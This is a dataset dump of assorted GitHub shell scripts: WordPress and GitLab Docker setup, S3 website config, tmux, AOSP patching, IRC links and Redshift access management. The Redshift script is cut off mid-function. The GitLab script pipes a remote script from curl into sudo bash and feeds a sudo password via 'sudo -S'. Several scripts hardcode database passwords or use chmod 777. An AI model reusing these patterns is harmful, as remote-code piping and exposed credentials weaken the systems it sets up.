blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
f12e1350369e2c04a28a4f0a2f0135814f139004
|
Shell
|
josh-martin989/BioperlClass
|
/week07/q1.sh
|
UTF-8
| 134
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
for j in $(seq 1 4);
do
touch q1_file$j
done
mkdir -p q1_test
for i in $(seq 1 4);
do
mv ./q1_file$i ./q1_test/
done
| true
|
fb9539ddafe31ada17870f774f0a1a76aa63d8f4
|
Shell
|
bernEsp/algorithms
|
/zshrc
|
UTF-8
| 1,553
| 2.609375
| 3
|
[] |
no_license
|
# @author Sebastian Tramp <mail@sebastian.tramp.name>
# # @license http://opensource.org/licenses/gpl-license.php
# #
# # the main RC file (will be linked to ~/.zshrc)
# #
#
# # first include of the environment
# source $HOME/.config/zsh/environment.zsh
#
# typeset -ga sources
# sources+="$ZSH_CONFIG/environment.zsh"
# sources+="$ZSH_CONFIG/options.zsh"
# sources+="$ZSH_CONFIG/prompt.zsh"
# sources+="$ZSH_CONFIG/functions.zsh"
# sources+="$ZSH_CONFIG/aliases.zsh"
#
# # highlights the live command line
# # Cloned From: git://github.com/nicoulaj/zsh-syntax-highlighting.git
# sources+="$ZSH_CONFIG/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh"
#
# # provides the package name of a non existing executable
# # (sudo apt-get install command-not-found)
# sources+="/etc/zsh_command_not_found"
#
# # Check for a system specific file
# systemFile=`uname -s | tr "[:upper:]" "[:lower:]"`
# sources+="$ZSH_CONFIG/$systemFile.zsh"
#
# # Private aliases and adoptions
# sources+="$ZSH_CONFIG/private.zsh"
#
# # completion config needs to be after system and private config
# sources+="$ZSH_CONFIG/completion.zsh"
#
# # fasd integration and config
# sources+="$ZSH_CONFIG/fasd.zsh"
#
# # Private aliases and adoptions added at the very end (e.g. to start byuobu)
# sources+="$ZSH_CONFIG/private.final.zsh"
#
#
#
# # try to include all sources
# foreach file (`echo $sources`)
# if [[ -a $file ]]; then
# source $file
# fi
# end
#
#powerline
source /usr/local/lib/python2.7/site-packages/powerline/bindings/zsh/powerline.zsh
| true
|
1ba2f40f88fbba63c4646aa33260ddf8be2c181e
|
Shell
|
HayrapetyanSV/lab_OSS
|
/lab3/2.5.sh
|
UTF-8
| 211
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
find ~ -type f -name "*.txt"
find ~ -type f -name "*.txt" -exec cat {} >> /tmp/file2.5.txt \;
echo "Всего строк:"
cat /tmp/file2.5.txt | wc -l
echo "Размер:"
du -b /tmp/file2.5.txt
| true
|
4f657c2c4033923484853dc57c9abf468dd746fb
|
Shell
|
domitry/exp_c
|
/build.sh
|
UTF-8
| 145
| 2.546875
| 3
|
[
"MIT",
"CC-BY-2.0"
] |
permissive
|
#!/bin/sh
src="../ex${1}.c"
dst="./ex${1}.out"
cd compiled
gcc $src -o $dst -lm -lGL -lglut -Wall
echo "builded :)"
$dst
echo "done :-)"
cd ..
| true
|
6c3c7ee6d55351007be7a83da1d8f772cf4a201a
|
Shell
|
viniciusesteter/WordPress_Zabbix
|
/iniciar_wordpress.sh
|
UTF-8
| 2,514
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
cd /tmp #Ir ao diretório /tmp
sudo yum install -y https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm #Baixar e instalar o SSM Agent
sudo systemctl enable amazon-ssm-agent #Iniciar com a instância o SSM Agent
sudo systemctl start amazon-ssm-agent #Iniciar com a instância o SSM Agent
sudo yum update -y #Updte da instância/SO
sudo amazon-linux-extras install -y docker #Instalações dos extras do docker vindas da Amazon
sudo yum install -y docker #Instalação do docker
sudo service docker start #Iniciado serviço Docker
sudo curl -L "https://github.com/docker/compose/releases/download/1.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose #Baixado e instalado docker-compose de acordo com informações do Docker Hub do Docker-Compose
sudo chmod +x /usr/local/bin/docker-compose #Permissões de execução do docker-compose
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose #Criação de link simbólico para o docker-compose caso falhe a instalação.
sudo mkdir /wordpress #Criar o diretorio wordpress
sudo cd /wordpress/
sudo touch docker-compose.yml #Criar arquivo docker-compose-yml
sudo tee -a docker-compose.yml > /dev/null <<EOT
version: '3'
services:
# Base de dados
db:
image: mysql:5.7
volumes:
- ./volumes/mysql:/var/lib/mysql
restart: always
environment:
MYSQL_ROOT_PASSWORD: password
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
networks:
- wpsite
# phpmyadmin
phpmyadmin:
depends_on:
- db
image: phpmyadmin/phpmyadmin
restart: always
ports:
- '8080:80'
environment:
PMA_HOST: db
MYSQL_ROOT_PASSWORD: password
networks:
- wpsite
# Wordpress
wordpress:
depends_on:
- db
image: wordpress:latest
ports:
- '8000:80'
volumes:
- ./volumes/wordpress/:/var/www/html
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
networks:
- wpsite
networks:
wpsite:
volumes:
db_data:
EOT
sudo docker-compose up -d #Iniciado docker-compose, onde nessa parte o próprio docker instala o wordpress na última versão
sudo systemctl start docker.service #Iniciar o serviço Docker quando iniciar a instância.
sudo systemctl enable docker.service #Iniciar o serviço Docker quando iniciar a instância.
| true
|
76ffeebc122ce1d75ae39ff65f24ec348c860e39
|
Shell
|
ybz216/exonum-java-binding
|
/.travis/run_python_tests.sh
|
UTF-8
| 946
| 3.03125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# Runs unit tests of exonum_launcher_java_plugins.
# Fail immediately in case of errors and/or unset variables
set -eu -o pipefail
# Echo commands so that the progress can be seen in CI server logs.
set -x
cd "${TRAVIS_BUILD_DIR}/exonum-java-binding"
# Generate protobuf files needed for plugins
source ./tests_profile
mvn install -DskipTests -DskipRustLibBuild -pl common -am
cd "exonum_launcher_java_plugins"
# Install pip
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python3.7 get-pip.py --user
# Install dependencies
pip3 install --user -r requirements.txt --no-binary=protobuf
# Install exonum_launcher_java_plugins
pip3 install --user -e .
# Download latest protobuf compiler
wget https://github.com/protocolbuffers/protobuf/releases/download/v3.11.3/protoc-3.11.3-linux-x86_64.zip
unzip protoc-3.11.3-linux-x86_64.zip
export PROTOC="$(pwd)/bin/protoc"
# Run tests
cd tests
python3.7 -m unittest -v
| true
|
0119908bcded7a64673cb376b6202af8166aaf13
|
Shell
|
ddkits/cli
|
/ddkits-files/ddkits/ddk-git.sh
|
UTF-8
| 6,455
| 3.234375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/bin/sh
# Script.sh
#
# PHP7
#
# This system built by Mutasem Elayyoub DDKits.com
# delete the old environment yml file
if [[ -f "${DDKITSFL}/ddkits.env.yml" ]]; then
rm $DDKITSFL/ddkits.env.yml
fi
# delete the old environment yml file
if [[ -f "${DDKITSFL}/ddkitsnew.yml" ]]; then
rm $DDKITSFL/ddkitsnew.yml
fi
# delete the old environment yml file
if [[ -f "${DDKITSFL}/ddkits-files/git/Dockerfile" ]]; then
rm $DDKITSFL/ddkits-files/git/Dockerfile
fi
# delete the old environment yml file
if [[ -f "${DDKITSFL}/ddkits-files/ddkits.fix.sh" ]]; then
rm $DDKITSFL/ddkits-files/ddkits.fix.sh
fi
if [[ -f "${DDKITSFL}/ddkits-files/git/sites/$DDKITSHOSTNAME.conf" ]]; then
rm $DDKITSFL/ddkits-files/git/sites/$DDKITSHOSTNAME.conf
fi
if [[ -f "${DDKITSFL}/ddkits-files/git/sites/gitlab.rb" ]]; then
rm $DDKITSFL/ddkits-files/git/sites/gitlab.rb
fi
if [[ ! -d "${DDKITSFL}/ddkits-files/git/sites" ]]; then
mkdir $DDKITSFL/ddkits-files/git/sites
chmod -R 777 $DDKITSFL/ddkits-files/git/sites
fi
# LAMP PHP 7
if [[ ! -d "${DDKITSFL}/ddkits-files/ddkits/ssl" ]]; then
mkdir $DDKITSFL/ddkits-files/ddkits/ssl
chmod -R 777 $DDKITSFL/ddkits-files/ddkits/ssl
fi
cat "./ddkits-files/ddkits/logo.txt"
# create the crt files for ssl
openssl req \
-newkey rsa:2048 \
-x509 \
-nodes \
-keyout $DDKITSSITES.key \
-new \
-out $DDKITSSITES.crt \
-subj /CN=$DDKITSSITES \
-reqexts SAN \
-extensions SAN \
-config <(cat /System/Library/OpenSSL/openssl.cnf \
<(printf '[SAN]\nsubjectAltName=DNS:'$DDKITSSITES'')) \
-sha256 \
-days 3650
mv $DDKITSSITES.key $DDKITSFL/ddkits-files/ddkits/ssl/
mv $DDKITSSITES.crt $DDKITSFL/ddkits-files/ddkits/ssl/
echo "ssl crt and .key files moved correctly"
echo -e '
<VirtualHost *:80>
ServerAdmin melayyoub@outlook.com
ServerName '$DDKITSSITES'
'$DDKITSSERVERS'
DocumentRoot /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'
ErrorLog /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'/error.log
CustomLog /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'/access.log combined
<Location "/">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Location>
<Directory "/opt/gitlab">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Directory>
</VirtualHost> <VirtualHost *:443>
ServerAdmin melayyoub@outlook.com
ServerName '$DDKITSSITES'
'$DDKITSSERVERS'
DocumentRoot /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Location "/">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Location>
<Directory "/var/www/html">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Directory>
</VirtualHost>
' > $DDKITSFL/ddkits-files/git/sites/$DDKITSHOSTNAME.conf
cat $DDKITSFL/ddkits-files/git/sites/gitlab-example.rb > $DDKITSFL/ddkits-files/git/sites/gitlab.rb
echo -e "## GitLab URL
##! URL on which GitLab will be reachable.
##! For more details on configuring external_url see:
##! https://docs.gitlab.com/omnibus/settings/configuration.html#configuring-the-external-url-for-gitlab
external_url 'http://"$DDKITSSITES"'
# Give apache user privileges to listen to GitLab
web_server['external_users'] = ['www-data']
### GitLab database settings
###! Docs: https://docs.gitlab.com/omnibus/settings/database.html
###! **Only needed if you use an external database.**
gitlab_rails['db_adapter'] = 'mysql'
gitlab_rails['db_encoding'] = 'unicode'
# gitlab_rails['db_collation'] = nil
gitlab_rails['db_database'] = '"$MYSQL_DATABASE"'
gitlab_rails['db_pool'] = 10
gitlab_rails['db_username'] = '"${MYSQL_USER}"'
gitlab_rails['db_password'] = '"$MYSQL_ROOT_PASSWORD"'
gitlab_rails['db_host'] = '"${DDKITSIP}"'
gitlab_rails['db_port'] = "${DDKITSDBPORT}"
# gitlab_rails['db_socket'] = nil
# gitlab_rails['db_sslmode'] = nil
# gitlab_rails['db_sslrootcert'] = nil
# gitlab_rails['db_prepared_statements'] = false
# gitlab_rails['db_statements_limit'] = 1000
#### Redis TCP connection
gitlab_rails['redis_host'] = '"${DDKITSIP}"'
gitlab_rails['redis_port'] = "${DDKITSREDISPORT}"
# gitlab_rails['redis_password'] = nil
# gitlab_rails['redis_database'] = 0
" >> $DDKITSFL/ddkits-files/git/sites/gitlab.rb
echo -e '
FROM ddkits/lamp:'$DDKITSPHPVERSION'
MAINTAINER Mutasem Elayyoub "melayyoub@outlook.com"
RUN ln -sf $DDKITSFL/logs /var/log/nginx/access.log \
&& ln -sf $DDKITSFL/logs /var/log/nginx/error.log \
&& chmod 600 /etc/mysql/my.cnf \
&& a2enmod rewrite \
&& rm /etc/apache2/sites-enabled/*
COPY ./sites/gitlab.rb /var/www/html/gitlab.rb
RUN chmod -R 777 /var/www/html
COPY php.ini /etc/php/7.0/fpm/php.ini
COPY ./sites/'$DDKITSHOSTNAME'.conf /etc/apache2/sites-enabled/'$DDKITSHOSTNAME'.conf
# Fixing permissions
RUN chown -R www-data:www-data /var/www/html
RUN usermod -u 1000 www-data
' > $DDKITSFL/ddkits-files/git/Dockerfile
echo -e '
apt-get install -y curl openssh-server ca-certificates --force-yes -y
curl https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash
apt-get install gitlab-ce -y
cp /var/www/html/gitlab.rb /etc/gitlab/gitlab.rb
chown -R www-data:www-data /opt/gitlab
chown -R www-data:www-data /etc/gitlab
usermod -u 1000 www-data
apt-get install -y postfix
systemctl restart gitlab-runsvdir \
&& systemctl start sshd postfix \
&& systemctl enable sshd postfix \
&& iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT \
&& /etc/init.d/iptables save \
&& gitlab-ctl reconfigure ' > $DDKITSFL/git-deploy/ddkits.fix.sh
echo -e 'version: "3.1"
services:
web:
build: '${DDKITSFL}'/ddkits-files/git
image: ddkits/git:latest
volumes:
- '${DDKITSFL}'/git-deploy:/opt/gitlab
stdin_open: true
tty: true
container_name: '${DDKITSHOSTNAME}'_ddkits_web
networks:
- ddkits
ports:
- "'$DDKITSWEBPORT':80"
- "'$DDKITSWEBPORTSSL':443"
' >> $DDKITSFL/ddkits.env.yml
# create get into ddkits container
echo $SUDOPASS | sudo -S cat ~/.ddkits_alias > /dev/null
alias ddkc-$DDKITSSITES='docker exec -it ${DDKITSHOSTNAME}_ddkits_web /bin/bash'
# fixed the alias for machine
echo "alias ddkc-"$DDKITSSITES"='ddk go && docker exec -it "$DDKITSHOSTNAME"_ddkits_web /bin/bash'" >> ~/.ddkits_alias_web
echo $SUDOPASS | sudo -S chmod -R 777 $DDKITSFL/git-deploy
cd $DDKITSFL
| true
|
16ecab0e7f132654cbb1935ebf936d36e7f95710
|
Shell
|
rjmeats/AWS-Trials
|
/AWSTrials/CLI/websites/setupSimpleS3Bucket.sh
|
UTF-8
| 1,405
| 3.421875
| 3
|
[] |
no_license
|
. ../aws_env_setup.sh
. ./env.sh
echo
echo $SHELL at $(date)
MY_BUCKET="${SIMPLE_S3_BUCKET_NAME}"
echo
echo "S3 bucket is ${MY_BUCKET}"
echo "Bucket region is ${BUCKET_REGION}"
echo "Source files are under ${SIMPLE_SITE_FILES}"
if [[ -z "${MY_BUCKET}" ]]
then
echo "Bucket name not defined"
exit 1
fi
# Tell S3 to treat this bucket as a website
TMP_CFG_FILE=site.cfg.$$
# Here document to specify website config info
cat > ${TMP_CFG_FILE} << EOF
{
"IndexDocument": {
"Suffix": "index.html"
}
}
EOF
echo
echo "Tell S3 that this bucket is a website"
echo
aws s3api put-bucket-website --bucket ${MY_BUCKET} --website-configuration file://${TMP_CFG_FILE}
rm ${TMP_CFG_FILE}
echo
echo "Show bucket website info"
echo
aws s3api get-bucket-website --bucket ${MY_BUCKET}
# Tell S3 to make this public publically readable
TMP_CFG_FILE=policy.cfg.$$
# Here document to specify website config info
cat > ${TMP_CFG_FILE} << EOF
{
"Version":"2012-10-17",
"Statement":[{
"Sid":"PublicReadGetObject",
"Effect":"Allow",
"Principal": "*",
"Action":["s3:GetObject"],
"Resource":["arn:aws:s3:::${MY_BUCKET}/*"
]
}
]
}
EOF
echo
echo "Tell S3 to use a public access policy for the bucket"
echo
aws s3api put-bucket-policy --bucket ${MY_BUCKET} --policy file://${TMP_CFG_FILE}
rm ${TMP_CFG_FILE}
echo
echo "Show bucket policy"
echo
aws s3api get-bucket-policy --bucket ${MY_BUCKET}
| true
|
226f70a4a29cf20f75572bbbcdf7b0e21f4e2a9d
|
Shell
|
eemed/tmux-picker
|
/tmux-picker.sh
|
UTF-8
| 3,038
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
function init_picker_pane() {
local picker_ids=$(tmux new-window -F "#{pane_id}:#{window_id}" -P -d -n "[picker]" "/bin/sh")
local picker_pane_id=$(echo "$picker_ids" | cut -f1 -d:)
local picker_window_id=$(echo "$picker_ids" | cut -f2 -d:)
if [[ ! -z "$last_pane_id" ]]; then # to save precious milliseconds;)
local current_size=$(tmux list-panes -F "#{pane_width}:#{pane_height}:#{?pane_active,active,nope}" | grep active)
local current_width=$(echo "$current_size" | cut -f1 -d:)
local current_height=$(echo "$current_size" | cut -f2 -d:)
local current_window_size=$(tmux list-windows -F "#{window_width}:#{window_height}:#{?window_active,active,nope}" | grep active)
local current_window_width=$(echo "$current_window_size" | cut -f1 -d:)
local current_window_height=$(echo "$current_window_size" | cut -f2 -d:)
# this is needed to handle wrapped lines inside split windows:
tmux split-window -d -t "$picker_pane_id" -h -l "$((current_window_width - current_width - 1))" '/bin/sh'
tmux split-window -d -t "$picker_pane_id" -l "$((current_window_height - current_height - 1))" '/bin/sh'
fi
echo "$picker_pane_id:$picker_window_id"
}
function capture_pane() {
local pane_id=$1
local out_path=$2
local pane_info=$(tmux list-panes -s -F "#{pane_id}:#{pane_height}:#{scroll_position}:#{?pane_in_mode,1,0}" | grep "^$pane_id")
local pane_height=$(echo $pane_info | cut -d: -f2)
local pane_scroll_position=$(echo $pane_info | cut -d: -f3)
local pane_in_copy_mode=$(echo $pane_info | cut -d: -f4)
local start_capture=""
if [[ "$pane_in_copy_mode" == "1" ]]; then
start_capture=$((-pane_scroll_position))
end_capture=$((pane_height - pane_scroll_position - 1))
else
start_capture=0
end_capture="-"
fi
tmux capture-pane -e -J -p -t $pane_id -E $end_capture -S $start_capture > $out_path
}
function pane_exec() {
local pane_id=$1
local pane_command=$2
tmux send-keys -t $pane_id " $pane_command"
tmux send-keys -t $pane_id Enter
}
function prompt_picker_for_pane() {
local current_pane_id=$1
local last_pane_id=$2
local picker_init_data=$(init_picker_pane "$last_pane_id")
local picker_pane_id=$(echo "$picker_init_data" | cut -f1 -d':')
local picker_window_id=$(echo "$picker_init_data" | cut -f2 -d':')
local tmp_path=$(mktemp)
capture_pane "$current_pane_id" "$tmp_path"
pane_exec "$picker_pane_id" "$CURRENT_DIR/hint_mode.sh \"$current_pane_id\" \"$picker_pane_id\" \"$last_pane_id\" \"$picker_window_id\" $tmp_path"
echo $picker_pane_id
}
last_pane_id=$(tmux display -pt':.{last}' '#{pane_id}' 2>/dev/null)
current_pane_id=$(tmux list-panes -F "#{pane_id}:#{?pane_active,active,nope}" | grep active | cut -d: -f1)
picker_pane_id=$(prompt_picker_for_pane "$current_pane_id" "$last_pane_id")
| true
|
98a1dc8c291531241786ab85476286d3c4e23d95
|
Shell
|
aosp-tissot/local_manifest
|
/patch.sh
|
UTF-8
| 1,206
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
patches="$(readlink -f -- $1)"
wget https://github.com/aosp-tissot/local_manifest/raw/aosp-11.0/sooti-patches.zip
unzip sooti-patches.zip
for project in $(cd $patches/patches; echo *) $(cd $patches/sooti-patches; echo *) ;do
p="$(tr _ / <<<$project |sed -e 's;platform/;;g')"
[ "$p" == build ] && p=build/make
repo sync -l --force-sync $p
pushd $p
git clean -fdx; git reset --hard
for patch in $patches/patches/$project/*.patch $patches/sooti-patches/$project/*.patch;do
#Check if patch is already applied
if patch -f -p1 --dry-run -R < $patch > /dev/null;then
continue
fi
if git apply --check $patch;then
git am $patch
elif patch -f -p1 --dry-run < $patch > /dev/null;then
#This will fail
git am $patch || true
patch -f -p1 < $patch
git add -u
git am --continue
else
echo "Failed applying $patch"
fi
done
popd
done
| true
|
2b283f2fcf0a8f4b4014a8b89281bfcf47ea1815
|
Shell
|
OragamiSwami/Piss_Scraper
|
/pull_piss_links.sh
|
UTF-8
| 1,726
| 3.53125
| 4
|
[] |
no_license
|
#author :OragamiSwami
#date :20210605
#version :0.1
#notes :Install curl and unrealircd (https://www.unrealircd.org/download)
#usage :pull_piss_links.sh
cd "$(dirname "$0")"
log="pull.log"
hubfile="hubs.conf"
linkfile="links.conf"
unreal_dir="/home/ircd/unrealircd/"
echo "Start @ `date`" &>> $log
function pull {
name=$1
link=$2
file=$3
mincount=$4
echo "Pulling $name" &>> $log
curl -sk "$link" -o .$file.orig
c=`grep -c host .$file.orig`
cat .$file.orig | tr -cd '[:alnum:]._\-;#":,\{\}\(\)\/\!\?\*+=@ \n\t'"'" | sed 's/^ [^ ]//;s/\t/ /g;s/autoconnect\s*;//' > .$file.tmp
awk '/^(link|ban) /,/^}/' .$file.tmp > $file
d=`grep -c hostname $file`
echo "Got $d links for $name" &>> $log
if [ $d -ne $c ] && [ $d -ne `expr $c - 1` ] && [ $d -le $mincount ] ; then
echo "$name count check failed.. Restoring LNG" &>> $log
cp $file .$file.bad
cp .$file.lng $file || ( echo "Failed to restore LNG" &>> $log; return -1)
fi
$unreal_dir/unrealircd configtest &>> $log && cp $file .$file.lng || ( cp $file .$file.bad; cp .$file.lng $file )
echo "End $name" &>> $log
}
pull "Hubs" "https://api.shitposting.space/link/hubs" $hubfile 10
pull "Americas" "https://api.shitposting.space/link/leaves/America" $linkfile 20
#pull "Europe" "https://api.shitposting.space/link/leaves/Europe" $linkfile 20
#pull "APAC" "https://api.shitposting.space/link/leaves/APAC" $linkfile 11
#pull "Africa" "https://api.shitposting.space/link/leaves/Africa" $linkfile 1
sed -i 's/class servers;/class hubs;/' $hubfile
$unreal_dir/unrealircd configtest &>>$log && $unreal_dir/unrealircd rehash &>>$log
echo -e "End @ `date`\n\n" &>> $log
| true
|
0ddbf549b2f5189e0d489640fcb0491ce463dadc
|
Shell
|
ravitomar2010/hello-world
|
/a2i-devops/tools/manage_redshift/modifyBatchAccess.sh
|
UTF-8
| 12,758
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
#######################################################################
########################### Global Variables ##########################
#######################################################################
filename=tmpAccessList.txt
##################### Test Parameters ##############
dbClient='hyke'
env='stage'
batchUser='batch_pricing'
schemaNames='audit_sysmgmt, delivery_dbo'
accessLevel='READ'
#######################################################################
############################# Generic Code ############################
#######################################################################
getProfile(){
# curr_dir=`pwd`
# profile=`echo "$curr_dir" | rev | cut -d '/' -f1 | rev`
echo "dbClient is $dbClient"
profile="${env}"
echo "profile is $profile"
if [[ $profile == 'stage' ]]; then
redshfitClusterID='axiom-rnd'
else
redshfitClusterID='axiom-stage'
fi
}
getConnectionDetails(){
echo 'Fetching required parameters from SSM'
hostName=`aws ssm get-parameter --name "/a2i/$profile/redshift/host" --with-decryption --profile $profile --output text --query Parameter.Value`
portNo=`aws ssm get-parameter --name "/a2i/$profile/redshift/port" --with-decryption --profile $profile --output text --query Parameter.Value`
dbName=`aws ssm get-parameter --name "/a2i/$profile/redshift/db/$dbClient" --with-decryption --profile $profile --output text --query Parameter.Value`
redshiftPassword=`aws ssm get-parameter --name "/a2i/infra/redshift_$profile/rootpassword" --with-decryption --profile $profile --output text --query Parameter.Value`
accountID=`aws ssm get-parameter --name "/a2i/$profile/accountid" --with-decryption --profile $profile --output text --query Parameter.Value`
if [[ $profile == "stage" ]]; then
redshiftUserName="axiom_rnd"
else
redshiftUserName="axiom_stage"
fi
# echo "$hostName,$portNo,$dbName,$redshiftPassword,$redshiftUserName,$accountID"
}
executeQueryAndGetResults(){
sqlQuery=$1
echo "Query is $sqlQuery"
results=`psql -tAX "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -F --no-align -c "$sqlQuery"`
}
executeQueryAndWriteResultsToFile(){
sqlQuery=$1
outputFile=$2
echo "Query is $sqlQuery"
results=`psql -tAX "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -F --no-align -c "$sqlQuery" > "$outputFile"`
}
executeQueryFile(){
sqlQueryFile=$1
echo "Executing queries from file $sqlQueryFile"
psql "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -a -w -e -f $sqlQueryFile
}
getSSMParameters(){
echo "Pulling parameters from SSM for $profile environment"
fromEmail=`aws ssm get-parameter --name /a2i/${profile}/ses/fromemail --profile ${profile} --with-decryption --query Parameter.Value --output text`
toMail=`aws ssm get-parameter --name /a2i/${profile}/ses/toAllList --profile ${profile} --with-decryption --query Parameter.Value --output text`
leadsMailList=`aws ssm get-parameter --name /a2i/${profile}/ses/leadsMailList --profile ${profile} --with-decryption --query Parameter.Value --output text`
devopsMailList=`aws ssm get-parameter --name /a2i/${profile}/ses/devopsMailList --profile ${profile} --with-decryption --query Parameter.Value --output text`
}
#######################################################################
######################### Feature Function Code #######################
#######################################################################
setInputParameters(){
if [[ $executionMode == 'auto' ]]; then
echo 'Execution mode is auto'
# aws s3 cp s3://a2i-devops-${env}/redshift/axiom/accessList.txt ./tmpAccessList.txt --profile $profile
else
echo 'Execution mode is local so setting dbClient'
dbClient=`echo $executionMode | cut -d '@' -f2`
echo "dbClient is set to $dbClient"
fi
}
fetchAccessListFromS3(){
aws s3 cp s3://a2i-devops-${env}/redshift/${dbClient}/accessList.txt ./tmpAccessList.txt --profile $profile
}
setAccessListInS3(){
echo 'Sorting file'
sort -o tmpAccessList.txt tmpAccessList.txt
echo 'Pushing file to s3'
aws s3 cp ./tmpAccessList.txt s3://a2i-devops-${env}/redshift/${dbClient}/accessList.txt --profile $profile
}
grantAccess(){
echo '#################################################################'
echo '##### I am done with correcting access file - Executing it #####'
echo '#################################################################'
./access.sh 'auto' ${dbClient} ${env}
}
fetchSchemaListFromSSM(){
echo "Fetching schema list from SSM for $dbClient db in $profile env"
aws ssm get-parameter --name "/a2i/$profile/redshift/${dbClient}/schema" --with-decryption --profile $profile --output text --query Parameter.Value > tmpSchemaList.txt
}
getCurrentAccessStatus(){
echo "Checking current READ access status for $batchUser"
grep -i "$batchUser READ" tmpAccessList.txt > tmpREADAccessStatus.txt
echo "Checking current READWRITE access status for $batchUser"
grep -i "$batchUser READWRITE" tmpAccessList.txt > tmpREADWRITEAccessStatus.txt
echo "Checking current MASTER access status for $batchUser"
grep -i "$batchUser MASTER" tmpAccessList.txt > tmpMASTERAccessStatus.txt
}
checkAccessStatus(){
if [[ $accessLevel == 'MASTER' ]]; then
echo 'Request access level is MASTER'
setMASTERAccess
elif [[ $accessLevel == 'READWRITE' ]]; then
echo 'Request access level is READWRITE'
setREADWRITEAccess
else
echo 'Request access level is READ'
setREADAccess
fi
}
setMASTERAccess(){
masterAccessList=''
oldMasterAccessList=$(cat tmpMASTERAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
# echo "tmpMaster is $tmpMaster"
if [[ $tmpMaster -gt 0 ]]; then
echo "Master entry already exists for $schemaName"
else
echo "Master entry does not exists for $schemaName - creating the same"
if [[ $masterAccessList == '' ]]; then
if [[ $oldMasterAccessList == '' ]]; then
masterAccessList="mstr_${batchUser} MASTER ${schemaName}"
else
masterAccessList="$(cat tmpMASTERAccessStatus.txt), $schemaName"
fi
else
masterAccessList="$masterAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldMasterAccessList"
echo "Final master access list is $masterAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $masterAccessList == '' ]]; then
echo 'No new entries to modify - Master entries already qualified'
elif [[ $oldMasterAccessList == '' ]]; then
echo "$masterAccessList" >> tmpAccessList.txt
else
sed -i -e "s|${oldMasterAccessList}|${masterAccessList}|g" tmpAccessListtest.txt
fi
}
setREADWRITEAccess(){
readWriteAccessList=''
oldReadWriteAccessList=$(cat tmpREADWRITEAccessStatus.txt | tr -d '\n')
# echo "old list is $oldMasterAccessList"
for schemaName in $(echo $schemaNames | sed "s/,/ /g")
do
if [[ $schemaName == '' ]]; then
echo 'No schemaName is provided as argument - Will break this execution'
else
echo "Working on $schemaName"
tmpReadWrite=$(grep -i "$schemaName" tmpREADWRITEAccessStatus.txt | wc -l | tr -d ' ')
tmpMaster=$(grep -i "$schemaName" tmpMASTERAccessStatus.txt | wc -l | tr -d ' ')
# echo "tmpReadWrite is $tmpReadWrite"
# echo "tmpMaster is $tmpMaster"
if [[ ($tmpReadWrite -gt 0) || ($tmpMaster -gt 0) ]]; then
echo "ReadWrite entry already exists for $schemaName"
else
echo "ReadWrite entry does not exists for $schemaName - creating the same"
if [[ $readWriteAccessList == '' ]]; then
if [[ $oldReadWriteAccessList == '' ]]; then
readWriteAccessList="mstr_${batchUser} READWRITE ${schemaName}"
else
readWriteAccessList="$(cat tmpREADWRITEAccessStatus.txt), $schemaName"
fi
else
readWriteAccessList="$readWriteAccessList, $schemaName"
fi
fi
fi
done
echo "old list is $oldReadWriteAccessList"
echo "Final readwrite access list is $readWriteAccessList"
echo "Appending this list to tmp file"
# echo "$masterAccessList" >> tmpMASTERAccessStatus.txt
if [[ $readWriteAccessList == '' ]]; then
echo 'No new entries to modify - ReadWrite entries already qualified'
elif [[ $oldReadWriteAccessList == '' ]]; then
echo 'Creating new entries as READWRITE is empty'
echo "$readWriteAccessList" >> tmpAccessList.txt
else
echo 'Replacing READWRITE entries'
